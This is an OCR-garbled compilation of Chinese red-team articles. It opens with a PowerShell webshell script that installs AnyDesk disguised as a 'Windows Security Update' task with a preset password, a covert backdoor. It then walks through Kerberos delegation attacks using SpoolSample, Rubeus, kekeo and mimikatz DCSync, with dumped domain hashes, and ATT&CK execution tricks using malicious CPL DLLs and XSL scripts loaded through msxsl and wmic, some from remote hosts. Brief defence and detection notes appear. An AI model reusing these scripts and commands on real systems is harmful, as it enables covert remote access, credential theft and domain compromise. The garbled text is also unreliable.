:MinetpubNwwwroot»schtasks /run /tn Windows Security Update 
htasks /run /tn Windows Security Update 
6: 66606000 "Windows Security Update"66 





不 需要 到 目标 机 器 上 点 击 接受 ， 输 入 密码 即 可 


需要 密码 


HEAPS WAP. 


Eso 350 161 








分 享 一 个 高 权限 webshell 下 可 以 使 用 的 powershell 脚 本 
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E ^ 


$TarUser = (((Get-WmiObject -Class Win32_Process -Filter 'Namez"explorer.exe"'). 


") [0] 


$AppdataPath = "C:Users$TarUserAppDataRoamingAnyDesk" 

$curPath = (Get-Location).Path 

$PassData = "ad.anynet.pwd hash-z85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d29* 
$Password - "AnyDeskGetAccess" 

$url = "https://download.anydesk.com/AnyDesk.exe" 

$client = New-Object System.Net.WebClient 

$client.DownloadFile($url, "$CurPathwinUpdate.exe") 

schtasks /Create /TN Windows Security Update001 /SC monthly /tr "$CurPathWinUpde 
schtasks /run /tn Windows Security Update001 

Start-Sleep -s 15 

Get-Process | Where-Object ($ .Path -like "*WinUpdate*") | Stop-Process -Force 
Add-Content -Path $AppdataPathservice.conf -Value $PassData 

(Select-String -Path $AppdataPathsystem.conf -Pattern 'ad.anynet.id').Line 
Write-Output "Connect PassPassword: $Password" 


Schtasks /run /tn Windows Security Update001 
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防御 域内 委派 攻击 
1. 前 置 


0x00 委 派 


Kerberos 委派 允许 一 个 帐户 模拟 另 一 个 帐户 来 访问 资源 。 例如 ， 用 户 通过 Web 服 务 器 请 求 数据 ， 
但 是 所 需 的 数据 存储 在 其 他 数据 库 服务 器 中 ， 此 时 ，web 服 务 器 可 利用 委派 功能 来 模拟 用 户 去 访问 
数据 库 服 务 器 。 委 派 有 三 种 类 型 : 无 约束 委派 、 约 束 委派 、 基 于 资源 的 委派 。 


。 无 约束 委派 : 当 用 户 发 送 TGS 来 以 访问 设置 了 无 约束 委派 的 服务 ， 它 将 在 同一 个 请 求 中 附加 其 
TGT， 服 务 提取 用 户 的 TGT 并 将 其 保存 在 服务 器 的 LSASS 中 ， 以 备 后 用 。 然 后 ， a ali Ad 
模拟 用 户 请 求 网 络 内 (ADH) 的 任何 服务 。 涉 及 到 Kerberos 认 证 流程 ， 请 参考 Ks 8 


User's (Unapproved) 
actin in Service 1 «| [ser Service 2 | e Service N 
| 


à (1) Kerber Ss 





a) Ticket Granting Ticke |—— 
(3) Request forwarded TG Tt 
e—a Forwarded TGT reti e 
(5) Request ticket for Service 一 一 一 一 全 

Salk onesies 





(6) Ticket for Service "Ramee at o eE i 
——/ 7) Reque —- 
I——348) Request ticket for Service 2— 


a o Ticket for Service — 


(10) Request 
As User 


i«*—(11) Response—— 


— 


8&—/12) Response —34 
B ae 13) Request ticket for Service n o 
laica 14) Ticket for Service 一 一 一 i 
jk 15) Request as User i 


es oo 16) Response —————— —— —À 
Figure 1: Kerberos Delegation with Forwarded TGT 


。 约束 委派 : Windows Server 2003 中 引入 了 约束 委派 ， 它 允许 系统 管理 员 限 制 模拟 帐户 可 以 连 
接 的 服务 。 它 依赖 于 服务 主体 名 称 (SPN) 来 标识 哪些 服务 可 以 接收 委托 凭据 。 系 统管 理 员 必 
须 在 运行 前 端 应 用 程序 的 安全 主体 上 注册 SPN， 并 确保 林 中 没有 重复 的 SPN。 由 于 约束 委派 是 
在 前 端 服 务 器 上 管理 的 ， 因 此 后 端 服 务 器 管理 员 无 法 控制 谁 可 以 访问 其 资源 。 约 束 为 派 需 要 域 
管理 员 权 限 来 管理 受 约束 的 委派 ， 仅 限于 同一 域 中 的 安全 主体 ， 即 没有 跨 域 或 跨 林 范围 。 
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。 基于 资源 的 委派 : Windows Server 2012 中 的 基于 资源 的 约束 委派 通过 消除 对 SPN 的 依赖 ， 对 
域 管理 员 权限 的 需求 ， 允 许 资源 所 有 者 控制 委派 并 提供 跨 域 委派 来 改进 约束 委派 模型 。 它 适用 
于 计算 机 帐户 ， 用 户 帐户 和 服务 帐户 。 


0x01 MS-RPRN 


MS-RPRN-- 打 印 系统 远程 协议 ， 基 于 RPC (Remote Procedure Call) 的 一 种 协议 ， 支 持 客户 端 和 
服务 器 之 间 的 同步 打印 和 联机 操作 ， 包 括 打 印 任务 控制 以 及 打印 系统 管理 。 此 外 ， 打 印 系统 远程 协 
议 只 使 用 了 基于 命名 管道 的 RPC。 因 此 ， 源 和 目标 服务 器 会 通过 445 端 口 建立 网 络 连接 。 可 以 利用 
SpoolSample 通过 MS-RPRN RPC 接口 来 强制 到 其 他 Windows 主机 的 身份 验证 。 


0x03 S4U2self 和 SAU2proxy 


S4U2self 和 S4U2proxy 是 对 Kerberos 的 扩展 ， 详 细 内 容 可 参考 


2. 无 约束 委派 存在 威胁 


本 段 以 测试 环境 演示 无 约束 委派 存在 的 威胁 。 


环境 : 域 控 WIN-6BCSA1ED2BP.cate4cafe.com 


域 机 器 mssql.cate4cafe.com 


0x01 环 境 配 置 


环境 设置 ， 为 机 器 账户 设置 无 约束 委派 









z Active Directory 用 户 和 计算 机 
SA) ”操作 (A) mv) EE MSSQL 属性 
» eb Oo x 日 $w.uYum EA Mime RET SR 位 置 | 管理 者 BA 
TI Active Directory 与 产 和 计算 机 全称 xm 
| > Sim E MSSQL HEN SKE z28/9175,.ninSREIURBS— BHzG 
4 jj cate&cafe.com iK TEST 计算 机 


L E WIN10 iE 








909 


使 用 powerview 或 者 ADModule 等 工具 可 以 枚 举 出 域内 设置 了 委派 的 用 户 。 


PS C:\Users\mssql\Desktop\ADModule-master\ActiveDirectory> Get-ADComputer -Filter {TrustedForDelegation -eq $True) 


IbistinguishedName : CN=WIN<6BCSALED2BP ,OU=Domain Controllers,DC-cate4cafe,DC-com 
D BCSAIED2BP. cate4cafe.com 


: True 
: WIN-6BCSAIED2BP 


: computer 

+ 2c11487b-eceb-4297 -89b9-2b49a44f65e2 

: WIN-6BCSAIED2BPÉ 

> S-1-5-21-3059159032-1345188666-2070647 200-1002 
UserPrincipalName : 


pistinguishedName : CN-MSSQL , CN-Computers , DC-catedcafe,DC-com 

7 MSsql. cate4cafe.com 

> True E 

: MSSQL 
ObjectClass : comput 
ObjectGUID 3 2fbbedal- bc2d-4089-880b-b49cda691ed9 
iSamAccountName : MSSQL$ 
STD $ $-1:5-21-3059159032-1345188666-2070647200-1106 
WserPrincipalName : 





域 控 默 认 开 启 无 约束 委派 设置 。 


0x02 攻 击 步 又 


以 攻击 机 器 用 户 为 例 ， 攻 击 前 提 需 要 我 们 先 获 得 mssql.cate4cafe.com 机 器 的 管理 员 或 system 权 
限 。 假 设 我 们 已 获取 到 system 权 限 ， 以 该 权限 启动 执行 rubeus.exe monitor /interval:5 /filteruser: 域 
控 $ 。 下 一 步 利 用 SpoolSample 强 制 域 控 连 接 MSSQL 进 行 身 份 认证 ，rubeus 就 可 以 DC 的 认证 请 
求 ， 导 出 其 中 的 TGT。 


PS C:\Users\mssqt\Desktop\x64> .NSpoolSample v4.5. x64..exe WIN-6BCSALED28P.Cate4cafe.com mssgl.catedcafe.com 

{+] Converted DLL to shellcode 

f+] Executing RDI 

{+} Calling exported function 

argetServer: \\WIN-6BCSALED2BP.cate4cafe.com, CaptureServer: XWMnssql.catedcafe.com 

arget server attempted authentication and got an access denied. If coercing authentication to an NTLM challeng 
;e capture tool(e.g. responder/inveigh/MSF SMB capture), this is expected and indicates the coerced authenticati 





exe monitor /interva 













ClientName 
DomainName 
T argetDomainName 

2tDonainName 






ioney 


E e authent, renewable, forwarded, forwardable 
StartTime 
E n p ime 





CAOKHGTAX 


上 图 看 到 已 经 导出 了 base64 编 码 的 Ticket， 再 利用 Rubeus 将 Ticket 导 入 mssql， 就 有 了 dcsync 权 限 
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[*] Action: Import Ticket 
[+] Ticket successfully imported! 
PS C:\Users\mssql\Desktop\x64> klist 


当前 登录 ID 0:0x42a55 
绥 存 的 票证 : C1) 


t0 Zz pee: WIN-6BCSAIED2BP$ (à CATEACAFE. COM 
AR S32: krbtgt/CATE4CAFE.COM @ CATEACAFE.COM 
Kerberos 票证 加 密 类 型 : RSADSI RC4-HMAC (NT) 
票证 标志 0x60a10000 -> forwardable forwarded renewable pre_authent name. canoni 
开始 时 间 : 10/29/2019 9:32:51 (本 地 ) 
结束 时 间 : 10/29/2019 19:32:49 (本 地 ) 
续 订 时 间 : 11/5/2019 9:32:49 (本 地 ) 


mimikatz £ lsadump: :dcsync /domain:cate4cafe.com /all /csv 
[DC] 'catedcafe.com' will be the domain 
[DC] 'WIN-6BCSAIED2BP.cate4cafe.com' will be the DC server 
[DC] Exporting domain ‘cate4cafe.com' 
1001 cate4cafe 3c3d8bf7585cad247f14077932b1f275 
krbtgt 637892fc760310a6d60fa4 91 cbefce43 
winlO 3c3d8bf7585cad247f14077932b1f275 
WIN10$  acc600e91a4544293d47dd39ae67 d01e 
Administrator 3b24c391862F4a8531a245a0217708c4 
mssql 3c3d8bf7585cad247f14077932b1f275 
TEST$ 4c64c3f44783d266bblddaf7289aac6d 
test 3b24c391862f4a85 31a245a0217708c4 
MSSQL$  fb83el311dal45b3b47177c986879a32 
WIN-6BCSALED2BP$ cc78f4e257a0865564ab07 2b30c4 3855 





假如 域内 服务 用 户 开启 了 无 约束 委派 ， 在 服务 用 户 运行 服务 的 主机 上 会 存储 用 户 的 TGT， 直 接 用 
mimikatz 便 可 导出 。 这 种 攻击 方法 ， 除 了 可 以 用 于 攻击 域内 机 器 获取 相应 TGT， 还 可 以 在 获得 域 控 
权限 的 条 件 下 ， 用 于 作为 后 门 以 持续 控制 。 


3. 约 束 委派 存在 的 威胁 


本 段 以 测试 环境 演示 约束 委派 存在 的 威胁 。 
环境 : 域 控 WIN-6BCSA1ED2BP.cate4cafe.com 


域 用 户 mssql 
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前 提 : 已 有 约束 委派 用 户 的 密码 或 NTLM 


0x01 环 境 配置 


域内 服务 用 户 才 可 以 开启 委派 ， 可 使 用 SETSPN 或 者 ADS | 为 域 用 户 设置 SPN 使 其 成 为 服务 账户 。 


以 ADSI 为 例 ， 选 中 用 户 - 属 性 -servicePrincipalName- 编 辑 ， 添 加 一 个 服务 


ES 





} 
"— : | SGT ORAS 
IHA ”操作 (A) BBV) ”帮助 (H) | 
» e "| du E | EEA): servicePrincipalName 
T ADS RE xm | | ”要 添加 的 值 (Vj): 
4 Ñ 默认 命名 上 下 文 WIN-68CSA1ED28Bpcate4c| 本 CN=Adminil vni d 
4 DC-cate4cafe DC - com j CN=Allowed 
; CN=Builtin CN=cate4ca qu): 
b CN=Computers = | i 
OU=Domain Controllers aaa as http/mssal.cate4cafe.com 
' ae CN=Cloneal iisadmin/mssql.cate4cafe.com 
CN=ForeignSecurityPrincipals CN=Denied : i 
| CNzLostAndFound GR 
CN=M d Service A t : | 
anaged Service Accounts CNzOnsUpi 
CN=NTDS Quotas CN-D ot 
= ir 
| CN-Program Data d 
_ CN=Domair 
CN=System a 
| CN=TPM Devices ores 
b (2 CN=Users ND 
. CNz Domair 
CN=Enterpr 
CN-Enterpr 
CN=Group | 
CN=Guest | 
CN=krbtgt | 
CNzmssql | 
CN=Protect: mz E 
i a 


m > < ut { Es TEENER 





ER 


设置 userAccountControl, 添 加 TRUSTED_TO_AUTH_FOR_DELEGATION 属 性 使 其 能 使 用 s4u 协 议 


uri ced | 
userAccountControl 0x1010200 = ( NORMAL A! | 
userCert < 去 没 团 > 

userCertificate < 未 设置 > 

userParameters IE 

gi 整数 属性 编辑 器 

use 


userAccountControl 





n CNIDSAI aet hiRamaved -HRE 


属性 值 对 照 表 如 下 : 
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'ACCOUNTDISABELE 
'HOMEDIR REQUIRED 
LOCKOUT 
PASSWD_NOTREQD 
PASSVD_CANT_CHANGE 
















OxOQ080 


ENCRYPTED TEXT PYD ALLOWED 


TEMP DUPLICATE ACCOUNT 


NORMAL ACCOUNT 


Ox0800 





INTERDOMAIN TRUST ACCOUNT 


WORKSTATION TRUST ACCOUNT 
"SERVER. TRUST. ACCOUNT 
DONT EXPIRE PASSWORD 
MNS LOGON ACCOUNT 
SMARTCARD REQUIRED 
TRUSTED FOR DELEGATION 





8192 
65536 






NOT DELEGATED 
USE DES KEY ONLY 






DONT REQ PREAUTH 


PASSWORD EXPIRED 
TRUSTED TO AUTH FOR DELEGATION Hn Se (Gre ZIN 


这 里 只 要 在 原 有 值 上 加 上 TRUSTED_TO_AUTH_FOR_DELEGATION 对 应 的 十 进 制 值 即 可 。 比 如 我 
原始 值 是 66048(512+65536, 表 示 是 典型 默认 账户 + 密码 永 不 过 期 )， 加 上 
TRUSTED_TO_AUTH_FOR_DELEGATION 值 16777216 就 是 前 面 对 应 的 16843264。 


设置 msds-allowedtodelegateto 值 为 要 委派 的 服务 ， 比 如 cifs( 访 问 目标 文件 )，ldap(dcsync)。 这 里 委 
派 域 控 上 的 cifs 服 务 。 
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a ADS! SSE 
pe à a 
AA cub REX) FERH) T E. 
d» 2XOse Hr 
| > ADSI RAH || ae : 
4 5 BUSEL FR WIN-68CSA1ED2BP.cate4c | CN=Administrator 
| | 4 3 DCzcate4cafe DC- com CN-Allowed RODC Pass... 
| | CN=Builtin CN=cateécafe 
! bou CNzComputers ~ CN=Cert Publishers 
1 | | OUzDomain Controllers CN=Cloneable Domain C... 


| CN=ForeignSecurityPrincipals 

; CN=LastAndfound 

_ CN=Managed Service Accounts 

1 CN=NTDS Quotas 

| CN=Program Data s 

| | CNESystem - CN=Domain Computers 
| CN=TPM Devices 

Po CN=Users 


CN=Denied RODC Passw.. 
| CNz DnsAdmins 
| CN=DnsUpdateProxy 
CN=Domain Admins 


CN=Domain Controllers 





| CN=Domain Guests 





_CN=Domain Users 
中 | j _ CN=Enterprise Admins 
; CN=Enterprise Read-orl... 
Hl | 1 CN=Group Policy Creato... 
~ CN z Guest 
J CN krbtgt 
CNzmssql 
`- CN=Protected Users vi 








|| 设置 完 后 是 这 样 
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PARTUHEIRUNES 


com/CATEACAF 
ciis/WIN-GBCSA1ED2BP.catedcafe.com/cate4cafe.. 
ciis/WIN-GBCSATED2BP/CATEACAFE 
krbtgt/cate4cafe.com 








mssql Et [> mm 


es odes. V. Eee eit d 
(mA [ma [es |zess | zmamssmmxe | coms 
|sug | 地 址 | 帐户 ”| 配置 文件 | 电 活 | 委派 aR | eT | 


ET i [ors c $ f ; ene Ó—À 
委派 星 一 个 安全 敏 尺 的 操作 ， 它 允许 最 务 代表 另 一 个 用 户 运行 。 


不 信任 此 用 户 作为 委派 (O) 

倍 任 比 用户 作 为 任何 眼 务 的 委派 ( 仅 Kerberos)(T) 
© 仅 信任 此 用户 作为 指定 服务 的 委派 (U) 

O RAR Kerberos(K) 

© 使 用 任何 身分 验证 协议 (N) 


JURAK RAEES (S): 


| 服务 类 型 用 户 或 计算 机 eC PRS FR p 
| | cifs WIN-68CSA1ED2... cate4cafe.... 
|! krbtgt cate4cafe.com 
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S C:\users\mssqi\Desktop\x64> 'Get-DomainUser mssql 


: 191 
=) 2019/10/23 19:48:14 
distinguishedname : CN=mssql ,CN=Users ,DC=cate4cafe, DC=com 
objectclass t {top, person, organizationalPerson, user} 
idisplayname = mssq 
lastlogontimestamp = 2019/10/22 14:35:56 
serprincipalname s mssqlücated4cafe. com 
ame j : mssql 
objectsid 2 S-1-5-21-3059159032-1345188666-2070647200-1105 
amaccountname : ds 


: USER. OBJECT. 
: NEVER 


: 2019/10/30 8:14:23 


. 4df61632- oda AUS b27d-3d046ecefa54 
:.2019/10/30 1 42 
+ 1601/1/1 8: 00: oe 
sds-allowedtodelegateto : (kebtat/cate4cafe. Com, Cifs/WIN-b5BCSAIED2BP.cate4cafe.com/cate4cafe.com, cifs/ 
P.catedcafe.com, €ifs/WIN- OBCSAIED2BP.,.} 
objectcategory :CN=Person,CN=Schema,CN=Conf iguration,DC-cate4cafe,DC-com 
ids corepropagationdata : {2019/10/30 6:52: 14, 2019/9/6 5:31:13, 1601/1/1 0:00:01} 
erviceprincipalname k EE a 35ate4cafe、 com, http/mssql. cate4cafe. com} 
hencreated : 2019/9/6 5 
n : mssql 
lbadpwdcount $30 
cn : mssql 
Sseraccountcontrol : NORMAL. ACCOUNT, DONT EXPIRE PASSWORD, TRUSTED TO AUTH. FOR. DELEGATION 
lusncreated Sphere 
rimarygroupid pec. fe 
ipwdlastset : 2019/9/6 13:31:13 
lusnchanged z 86109 





所 以 ， 我 们 可 以 通过 Get-DomainUser 来 获取 域内 开启 了 约束 委派 的 用 户 


Get-DomainUser -TrustedToAuth -Properties distinguishedname,useraccountcontrol,n 
edtodelegateto | fl 


XA Cs ANSE NIIT Erte Get-Domainuser -TrustedToAuth -Properties distinguishedname ,useraccountcontrol ,msds-allowedt. 
delegateto 


distinguishedname CN=mssql,CN=Users ,DC=cate4cafe ,DC=com 

seraccountcontrol NORMAL ACCOUNT, DONT EXPIRE. PASSWORD, TRUSTED TO. AUTH.. FOR, DELEGATION 

isds-allowedtodelegateto : ícifs/WIN- OBCSAIED2BP. cate4cafe. com/catedcafe. com, cifs/WIN- dote D catedcafe.com, cifs/ 
WIN-GBCSALED2BP, cifs/WIN-6BCSALED2BP. cate4cafe.com/CATEACAFE...] 





0x02 攻 击 步 又 


为 用 户 申请 TGT 


IPS C:\Users\mssql\Desktop> .\kekeo.exe "tgt::ask /user:mssq] /domain:cate4cafe.com /password: PL«Ookm" exit 


kekeo 251 (x64) built on Oct 23 2019 01:59:17 

"A EN Vie, A L'Amour" 

JEUX 

Benjamin DELPY "genti lkiwi" C benjamin@genti Ikiwi.com ) 

http: //blog.gentilkiwi . com/kekeo e.eo 
with. 9 modules * * */ 


ekeo(commandline) # tgt::ask  /user:mssgl /domain:cate4cafe.com /password: PL«Ookm 
cate4cafe.com (cate4cafe) 
: mssql (mssql) 
: mssql [KRB.NT. PRINCIPAL (1)] 
: krbtgt/cate4cafe. com [KRB.NT.SRV.INST (2)] 
: Yes 
ENCRYPTION KEY 23 (rc4 hmac nt J): 3c3d8bf7585cad247f14077932b1tf275 
: WIN-6BCSALED2BP. cate4cafe. com (auto) 
> 192.168.0.5 (auto) 
> Ticket in file 'TGT. mssqlQCATEACAFE .COM_krbtgt~cated4cafe. com@CATE4SCAFE .COM.kirbi ' 





ekgo (command line) # exit 


这 里 可 以 用 /key 参 数 代替 /password 使 用 ntim 申 请 票据 。 


执行 执行 S4U2Proxy， 以 cate4cafevadministrator 用 户 身份 请 求 访问 CIFS 的 TGS 
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" -NAUsersWnssqiNDesktop» -\kekeo.exe "tgs::s4u /tgt:TGT mssqlOCATEACAFE.COM krbtgt fe.comáüc 
PS CiAdministratorücatedcafe.com 7cervice:cits/WIN-OBCSAIEDZBP. catedcafe. com" uii. woe uer 


kekeo 2.1 (x64) built on Oct 23 2019 01:59:17 

"A La Vie, A L'Amour” 

fk k 

"Benjamin DELPY "gentilkiwi' ( benjamin@gentitkiwi. com ) 

http: //blog. genti lkiwi . com/kekeo (0e.€0) 
with “9 modules * * */ 


c mmandline) # tgs::s4u /tgt:TGT_mssqI@CATE4CAFE.COM_krbtgt~cate4cafe. à -kirbi E 
Mei apa /service: cifs/WIN-OBCSALED2BP. cate4cafe. com €: Com@CATE4CAFE-COM-kirbi, /user:A 
icket : TGT_mssql@CATE4CAFE .COM_krbtgt~cate4cafe. com@CATE4SCAFE.COM. kirbi 
: krbtgt/cate4cafe.com @ CATEACAFE.COM 
[00000017] rc4_hmac_nt 
mssql @ CATE4CAFE.COM 
krbtgt/cate4cafe.com (à CATEACAFE . COM 
(2019/10/30 15:26:42 ; 2019/10/31 1:26:42) {R:2019/11/6 15:26:42} 
fenc-krb-cred] [40e10000] name canonicalize ; pre authent ; initial ; renewable ; forwardable ; 
[enc-krb-cred] K: ENCRYPTION KEY 23 (rc4 hmac.nt ): 3#2faf1248265bc3149fO1aed8b4 5207 
(s4u2self] Administrator@cate4cafe.com 
: WIN-6BCSALED2BP.cate4cafe.com (auto) 
: 192.168.0.5 Cauto) 
in file ’TGS_Administrator@cate4cafe.com@CATE4CAFE .COM_mssql@CATE4CAFE.COM.kirbi' 
service(s): 
- Pepe. cifs/WIN-6BCSALED2BP. cate4cafe. com 
> Ticket in file ‘TGS_Administrator@cate4cafe.com@CATE4CAFE . COM. cifs-WIN-6BCSAIED2BP. cate4cafe.com@CATE4c 


[krb-cred] 
[krb-cred] 
fenc-krb-cred] 
[enc-krb-cred] 
fenc-krb-cred] 


ANAWUMY 





。mimikatz 导 入 TGS 后 ， 可 以 访问 到 域 控 文 件 


imikatz(commandline> # kerberos::ptt TIGS_hdministPatohrecated4cafe-comeChTE4CRPFE2- 
'0M cifs^VIN-6BCSAO1ED2BP.catedcafe.comn(CATE4CAFE. COM. kirbi 


File: ’TGS_Administrator@cate4cafe .com@CATE4CAFE.COM _cifs°WIN-6BCSALED2BP cate 
cafe .com@CATE4CAFE.COM.kirbi’: OK 


nimikatz # exit 


>: Wsers \nssqiNDesktop>dir \NUIN-6 BCSALEDZBP .catedcafe .com\cs 
驱动 器 \\WIN-6BCSALED2BP.cate4cafe-com\c$ PAA 
兰 的 序列 号 是 8299-B1EE 


\\UIN-6BCSALED2BP.cate4cafe.com\c$ 的 目录 


2013/88/22 23:52 <DIR> Perf Logs 
2019/89/66 12:25 <DIR> Program Files 
2013708722 23:39 <DIR> Program Files 
2619/89/86 13:66 <DIR> Users 
2619/16/23 26:46 — <DIR> Windows 

8 ^ : 


$i : 
5 个 目录 53-171,073,024 可 用 字 节 





4. 防 御 


查找 为 所 有 类 型 的 委派 配置 的 用 户 帐户 ， 计 算 机 帐户 和 托管 服务 帐户 。 在 " Active Directory 用 户 和 
计算 机 (ADUC) "中 分 别 配置 帐户 ， 使 用 "帐户 敏感 且 无 法 委派 "标志 来 阻止 各 种 委派 。 在 所 有 域 控 
制 器 的 高 级 审核 策略 中 启用 Kerberos 审 核 ， 并 监视 从 委派 帐户 到 未 批准 服务 的 票证 ， 在 使 用 无 限制 
的 委托 帐户 服务 器 上 设置 出 站 防火 墙 规则 。 
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ATT&CK 攻 防 初 宇 系列 -- 执 行 篇 (一 ) 


JA ATT&C a 


BAATT&CK: 


ry tac 





T1196-Control Panel Items 


控制 面板 项 目 是 注册 的 可 执行 文件 (exe) 或 控制 面板 (cpl) 文件 ，CPL 实 际 上 是 重 命名 的 动态 链 
接 库 Cal) 文件 ， 可 导出 CPIApplet 函 数 。 控 制 面板 项 可 以 直接 从 命令 行 执 行 ， 也 可 以 通过 
Control RunDLL (API) 调用 或 者 直接 双击 文件 。 


攻击 者 可 以 使 用 控制 面板 项 目 来 执行 任意 命令 。 恶 意 控制 面板 项 目 可 以 通过 钓鱼 邮件 投递 ， 也 可 以 
作为 多 阶段 恶意 软件 的 一 个 执行 方法 。 控 制 面板 项 目 ， 尤 其 是 CPL 文 件 ， 也 可 能 会 绕 过 应 用 程序 或 
文件 扩展 名 白 名 单 。 


命令 执行 
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// dllmain.cpp : 定义 DLL 应 用 程序 的 入 口 点 。 
#include "stdafx.h" 


#include «windows.h- 


BOOL APIENTRY DllMain( HMODULE hModule, 
DWORD ul reason for call, 


LPVOID lpReserved 


switch (ul reason for call) 


case DLL PROCESS ATTACH: 
WinExec("cmd.exe /c calc", SW SHOW); 

case DLL THREAD ATTACH: 

case DLL THREAD DETACH: 

case DLL PROCESS. DETACH: 


break; 


return TRUE; 


这 里 我 们 用 了 点 取 巧 的 办 法 ， 直 接 将 代码 写 在 了 attach 里 面 ， 将 上 述 代码 编译 为 dll 文 件 
CPIApplet.dll( 可 以 随意 命名 ), 然 后 将 CPIApplet.dll 重 命名 为 CPlApplet.cpl 


技术 复 现 
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control.exe c:\users\W10PC1i\desktop\CPIApplet .cpl // 这 里 cp1 一 定 要 采用 绝对 路 径 否 则 失 
败 


RAS 10.0.1 


(c). 2019 Microsoft Corporation. 


C: MUsersAW1O0PCi»control C:XUse 


CAUsers\W10PC1\Desktop 





9.00 KB (9,216 F7) 


技术 复 现 (双击 ) 


计算 器 = n 
三 ”标准 
mimikatz tr | M+ M- MS 
Uns. 
y^ y x? 
Microsoft 
Edge CE C Gl 
7 8 9 
4 5 6 
1 2 3 
t 0 





技术 复 现 (使 用 导出 函数 Control_RunDLL) 


920 


rundli32.exe shell32.dll,Control RunDLL c:\users\W10PC1\desktop\CPIApplet .cpl 





威胁 检测 


。 数据 源 : _ API 监视， 二进制 文件 元 数据 ，DLL 监 视 ，Windows 注 册 表 ，Windows 事 件 日 志 ， 进 
程 命令 行 参 数 ， 进 程 监视 


。 进程 特征 : (Ral: 高 ) 


# 无 论 是 通过 control,exe 执 行 、 还 是 双击 ， 最 后 都 会 通过 rund1132 调 用 she1132 的 导出 函数 Control 上 


Image contains 'rundll32.exe' AND CommandLine contains 'Shell32.dll' AND Commanc 


> 


a a * 
LQ 0 本 
QQ Tw Vern windoes (ysten32 rund 1192 exe" Shel PIS dT. ConteoT Ron CCP Usens Om pci Desktop CPTApplet cori Ns 
QQ * 
a ¢ * 

a * 
ag * 
aa * c 
QATA 
Qacsx 
ane 

) Q * 
QQ 7% 
275 
aQT* 

A C * 

A ¢ * 


。 进程 特征 : (Aa: 仅 审 计 ) 
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# 执行 的 pay1oad 文 件 后 缀 名 不 一 定 是 cp1， 可 以 是 任意 后 缀 ， 为 了 防止 被 绕 过 检测 。 需要 记录 其 他 相关 调用 


Image contains 'rundll32.exe' AND CommandLine contains 'Shell32.dll' AND Commanc 


> 


Veiga cys tendina TTIE eee SheT TO ATT CHA tea RURDEL CUVE SKLOPE Desktop CP lapp Tet. tno 


£ 
e 
Bc SS 4. A.X. 9-9 TA 9. 4.9 Ww." — 9" 9 FH 


T1220 XSL Script Processing 


XSL 指 扩 展 样式 表 语 言 (EXtensible Stylesheet Language) 。 万 维 网 联盟 (W3C) 开始 发 展 XSL 的 
RAS: 存在 着 对 于 基于 XML 的 样式 表 语 言 的 需求 。 在 红 蓝 对 抗 中 ， 使 用 XSL 文 件 执行 恶意 代码 有 
时 可 以 帮助 我 们 绕 过 APPLocker。 下 面 介绍 两 种 利用 手段 。 


命令 执行 
技术 复 现 (MSXSL.EXE) 


msxsl. RR o oro Em 通过 它 我 们 可 以 执 f p as 
SAU RE einn vw.mict com 

m 接收 形 为 msxsl.exe ; prmifle) nes 的 参数 。 由 于 XSL 算 是 一 种 特殊 的 
XML， 我 们 可 以 使 用 msxsl exe (xslfile) {xslfile} 调 用 xs 文件 内 的 命令 。 





id=21714 
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Ail.xsl 

<?xml version='1.0'?> 

«xsl:stylesheet version="1.0" 
xmlns:xsl-"http://www.w3.0rg/1999/XSL/Transform" 
xmlns:msxsl-z"urn:schemas-microsoft-com:xslt" 


xmlns:user-"https://www.dbappsecurity.com.cn"» 


«msxsl:script language-"JScript" implements-prefix="user"> 
function xml(nodelist) { 
var r = new ActiveXObject("wWScript.Shell").Run("calc.exe"); 


return nodelist.nextNode().xml; 


«/msxsl:script» 
«xsl:template matchz"/"» 

<xsl:value-of selectz"user:xml(.)"/» 
</xsl:template> 


«/xsl:stylesheet» 


本 地 执行 


msxsl.exe Ail.xsl Ail.xsl 
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pa TU Te RECON SUO "RE " 
atonicsNTI1220NsrcOnsxsl.exe flil.xsl Ail.xsl 
qr v im Meet E version oÓ' 1.9" encoding = 
lts?fxnl-versioms"1.9H"2&mqt; | ifs 
she e rs i n 
[2E i rg Va ^ s 
= ch E » i A on jel 
tt = | 
Q 
| 
n M 1 
E + 
? : & i 
0 + 
= g= 
远程 执行 
msxsl.exe http://XXX.XXX.XXX.XXX/Ail.xsl http://XXx.XXX.XXX.XXX/Ail.xsl 
SPURL geese /fiil.xsl http://48 ABE) ME o =i 
encoding = "UTF -16"?>? | 
210028 go t's | 
ve s i £ LE li 9 


s 


m 





技术 复 现 (WMIC.EXE) 


wmic 可 以 通过 形 如 :wmic.exe {wmic_command} /FORMAT:{xsl_file} 的 方式 执行 xs! 内 的 恶意 代码 。 
{wmic command 内 可 以 填写 任意 的 wmic 可 执行 的 命令 


本 地 执行 


wmic process get name /format:Ail.xsl 
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D 
D 





远程 执行 





mic proce get nane /format:Ail.xsi 
?xml version-"1.0" encoding-"UIF-16"?5&1t;COMMAND SEQUENCENUM= IT ISSUEDFROM-'" 
IRNHE-SECEND". STORTTIME-'11-87—2019114:38:59' EUJBRYCOUNI-'"B'"&gt ;&1t ; REQUEST&gt ; 
1t;COMMANDLINERgt; process get nane /fornat:fil.xsl&lt;/COMMRNDLINE&gt ; &1t ; COM 
RNDLINECOMPONENTS&gt ;&1t ; NODELIST&gt ;&1t ;NODE&gt ; TIANHE-SECEND&1t ; /NODE&gt ; &1t ; 
ODELIST&gt ;&1t ; COMMANDLINECOMPONENTS&gt ;&1t ; CONTEXT&gt ; &1t ;NAMESPACERgt ; root 
inv2&1t;/NAMESPACE&Rgt ;&1t ; ROLERgt ; root \c Li&1t ;/ROLE&gt ;&1t ; IMPLEVEL&gt ; IMPERSON 
E&1t;/IMPLEUEL&gt ; &1t ; AUTHLEVEL&gt ; PRTPRIVACY&1t ; /AUTHLEVEL&gt ; &1t ; LOCALE&gt 5 m: 
804&1t ; /LOCALERgt ;&1t ; PRIUILEGES&gt ; ENABLER It ; /PRIUILEGES&gt ; &1t ; TRACES gt ; OFF& 
3/TRACERgt ; &1t ; RECORD&gt ;N/A& lt ; /RECORD&gt ; &1t ; INTERACT IUE&gt ; OFF&1t ; /INTERACT 
E&gt ;&lt;FRILFAST&gt ; OFFRIt; “FAILFAST&gt ; &1t ; OUTPUT&gt ;STDOUT&It ;/OUTPUT&gt 5&1 
;RPPEND&gt ; STDOUT&1t ; /APPEND&gt ;&1t ;USER&gt ;N/ABIt ;/USER&gt ; &1t ;AGGREGATE&gt ; ON 
lt;7RGGREGRTE&gt;&1t;/CONTEXT&gt ;&1t ;/REQUEST&gt;&1t; RESULTS NODE-'TIQRNHE-SECEN 
